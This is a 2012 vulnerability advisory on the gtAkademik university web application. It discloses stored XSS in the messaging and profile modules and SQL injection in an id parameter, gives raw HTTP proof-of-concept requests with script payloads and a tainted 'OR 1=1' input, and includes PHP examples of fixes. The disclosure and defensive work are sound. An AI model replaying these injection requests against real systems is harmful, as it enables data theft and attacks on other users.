
Spentera

Security Advisory SPN-01-2012 gtAkademik Gamatechno SQL Injection and Persistent Cross Site Scripting Vulnerability
February 20, 2012

Copyright 2012. Spentera. All rights reserved. http://www.spentera.com

Version 1.3


gtAkademik Gamatechno SQL Injection and Persistent Cross-site Scripting Security Advisory SPN-01-2012

Release Date: Monday, February 20, 2012
Last Update: Tuesday, June 19, 2012
Vendor Notification Date: Friday, February 10, 2012
Product: gtAkademik Gamatechno
Platform: PHP (tested on Ubuntu 11.10, Apache 2.2.11, PHP 5.3.9)
Affected Versions: Latest release (2011)
Risk Factor: High
Impact: Loss of integrity and confidentiality on server and client side.
Attack Vector: An attacker can retrieve data from the target database, and can stage a client-side attack by editing an existing user profile to inject a JavaScript XSS shell.
Solution Status: Unpatched

Software Description

gtAkademik Academica is a web-based application that focuses on academic and administrative data management for university students: managing KRS (Kartu Rencana Studi, course registration) activities, student grading, curriculum and semester management, through to DIKTI reporting. gtAkademik also offers an automated reporting system for EPSBED DIKTI, support for curriculum changes, easy management of student transcripts, a virtual class (eLearning), KRS and online coaching, and reporting.

Vulnerability Details

Persistent XSS
The application allows an attacker to store an XSS payload in the database, because there is no sanitization process on the submitted data. Two modules are affected: the Message Module and the Update Profile Module.

SQL Injection
The application also suffers from an SQL injection vulnerability, again because there is no sanitization process. This allows an attacker to extract the contents of the database and find a lot of important data, for example the credentials stored in the database.

Proof of Concept

Persistent XSS in Message Module

The Message Module is the internal messaging feature of gtAkademik. We can send a message containing an XSS payload to other users, for example to the administrator user:

POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg==
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 169

data%5BMessageSender%5D=XXXXXXXXXX&data%5BMessageReceiver%5D=XXXXXXXXXX&data%5BMessageTitle%5D=%3Cscript%3E&data%5BMessageContent%5D=%3Cscript%3E&act=doCompose&compBtn=Kirim

Persistent XSS in User Profile Module (save the user profile)

This module is used to update the user's own profile. We can inject an XSS payload into a profile field and save it to the database, so everyone who views our profile is attacked by the script:

POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM=
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

tanggal=02%2F08%2F1988&alamat_asal=XXXXXXXXXX&alamat=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan
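The following PHP is an added illustration written for this advisory; it is not gtAkademik code. It shows the rendering pattern that turns the two stored payloads above (the Message Module title/content and the profile `alamat` field) into script that runs in the viewer's browser, and the output-encoding fix. The field names come from the PoC requests; the `$rows` array is a constructed stand-in for what the database returns, and the rendering functions are hypothetical.

```php
<?php
// Added example, not gtAkademik code: why the payloads submitted by the two PoC
// requests execute for whoever views the message or the profile, and the fix.
// Field names (alamat, MessageTitle, MessageContent) come from the PoC requests;
// $rows is a constructed stand-in for rows read back from the database.
// Needs PHP 7 or later.
declare(strict_types=1);

// Constructed rows holding exactly the payloads the PoC requests submit.
$rows = [
    'profile' => ['alamat' => '<script>alert("XSS");</script>'],
    'message' => ['MessageTitle' => '<script>', 'MessageContent' => '<script>'],
];

// Vulnerable pattern: a stored value is concatenated straight into the page.
// The browser cannot tell the attacker's markup from the application's own.
function renderProfileVulnerable(array $profile): string
{
    return '<tr><td>Alamat</td><td>' . $profile['alamat'] . '</td></tr>';
}

// Fix: encode for the HTML context at the point of output, not on input.
// ENT_QUOTES also protects attribute values; ENT_SUBSTITUTE avoids returning an
// empty string on invalid UTF-8, which would otherwise blank the field silently.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderProfileFixed(array $profile): string
{
    return '<tr><td>Alamat</td><td>' . h($profile['alamat']) . '</td></tr>';
}

function renderMessageFixed(array $msg): string
{
    return '<h3>' . h($msg['MessageTitle']) . '</h3><p>' . h($msg['MessageContent']) . '</p>';
}

// Does the rendered page still carry the payload verbatim, i.e. as live markup?
function containsVerbatim(string $html, string $payload): bool
{
    return strpos($html, $payload) !== false;
}

$payload = $rows['profile']['alamat'];
$vuln    = renderProfileVulnerable($rows['profile']);
$fixed   = renderProfileFixed($rows['profile']);

echo $vuln, PHP_EOL;                             // the <script> element reaches the browser as markup
echo $fixed, PHP_EOL;                            // '<' and '"' are now entities, so it is shown as text
echo renderMessageFixed($rows['message']), PHP_EOL;

if (containsVerbatim($vuln, $payload) && !containsVerbatim($fixed, $payload)) {
    echo 'vulnerable output carries the payload verbatim; encoded output does not', PHP_EOL;
}
```

Encoding belongs at output because the same stored string may later be emitted into an attribute, a JavaScript string or a JSON response, each of which needs its own escaping rule; stripping tags on input would also not help against the Message Module, which stores whatever `data[MessageTitle]` and `data[MessageContent]` contain.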

SQL Injection in the id parameter

The id parameter of the following request is vulnerable to SQL injection:

http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204[INJECTED PARAMETER]
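The PHP below is an added illustration for this advisory, not gtAkademik code. It shows the string-concatenation pattern that makes an unquoted numeric `id` parameter injectable, and the validate-then-bind fix. The table `pendaftar` and its columns are hypothetical; the id value 129000204 is the one in the PoC URL; an in-memory SQLite database stands in for the real one so the script runs offline.

```php
<?php
// Added example, not gtAkademik code: the concatenation pattern behind an injectable
// id parameter, and the validate-then-bind fix. The table pendaftar and its columns
// are hypothetical; 129000204 is the id from the PoC URL. In-memory SQLite stands in
// for the real database so this runs offline (needs PHP 7+ with pdo_sqlite).
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pendaftar (id INTEGER PRIMARY KEY, nama TEXT, password TEXT)');
$db->exec("INSERT INTO pendaftar VALUES (129000204, 'Budi', 'rahasia1'), (129000205, 'Ani', 'rahasia2')");

// Vulnerable pattern: the request parameter becomes part of the SQL text, so whatever
// follows the number is parsed as SQL instead of being compared as a value.
function detailVulnerable(PDO $db, string $id): array
{
    $sql = 'SELECT id, nama FROM pendaftar WHERE id = ' . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fix: validate the parameter as an integer first, then bind it as one. The value
// never touches the SQL text, and a malformed id is rejected before any query runs.
function detailFixed(PDO $db, string $id): array
{
    $n = filter_var($id, FILTER_VALIDATE_INT);
    if ($n === false) {
        throw new InvalidArgumentException('id must be an integer');
    }
    $stmt = $db->prepare('SELECT id, nama FROM pendaftar WHERE id = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The benign request, and one with the shape of id=129000204[INJECTED PARAMETER].
$benign  = '129000204';
$tainted = '129000204 OR 1=1';

printf("vulnerable, benign id : %d row(s)%s", count(detailVulnerable($db, $benign)), PHP_EOL);
printf("vulnerable, tainted id: %d row(s), the WHERE clause was rewritten by the input%s",
    count(detailVulnerable($db, $tainted)), PHP_EOL);
printf("fixed, benign id      : %d row(s)%s", count(detailFixed($db, $benign)), PHP_EOL);
try {
    detailFixed($db, $tainted);
} catch (InvalidArgumentException $e) {
    printf("fixed, tainted id     : rejected (%s)%s", $e->getMessage(), PHP_EOL);
}
```

Because the parameter sits in an unquoted numeric position, quote-escaping functions such as mysql_real_escape_string() do nothing here: the injected text contains no quotes to escape. With the vulnerable variant, a UNION SELECT appended to the id can read any column the application's database user can see, which is the credential exposure the Vulnerability Details section describes.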

Solution
Unpatched

Discovered by
Mada R. Perdhana and Hanny Haliwela from Spentera Research.


About Us

Spentera is a limited liability security consulting company that focuses on penetration testing services, vulnerability discovery, and digital forensics. We have been providing satisfactory service to clients in Indonesia in particular, and the world at large. Our portfolio is proof that we are building this company seriously and pay attention to every aspect of the quality delivered to the client. All services we provide are based on international standards that are used as primary standards in countries such as the United States, Japan, Germany, France, and the United Kingdom. Our clients include the military, police, government, mining, oil and gas, and the private sector, such as finance and banking. Our security experts' seven years of experience speak for themselves. Our good relationship with our clients is the most important basis for the quality of service that we continue to improve.

Spentera
Centerflix Boutique Office
Jl. Danau Toba no. 104, Bendungan Hilir
Jakarta Pusat 10210, Jakarta, Indonesia
T: +62(21) 5701505
F: +62(21) 5738105
W: http://www.spentera.com
E: research@spentera.com
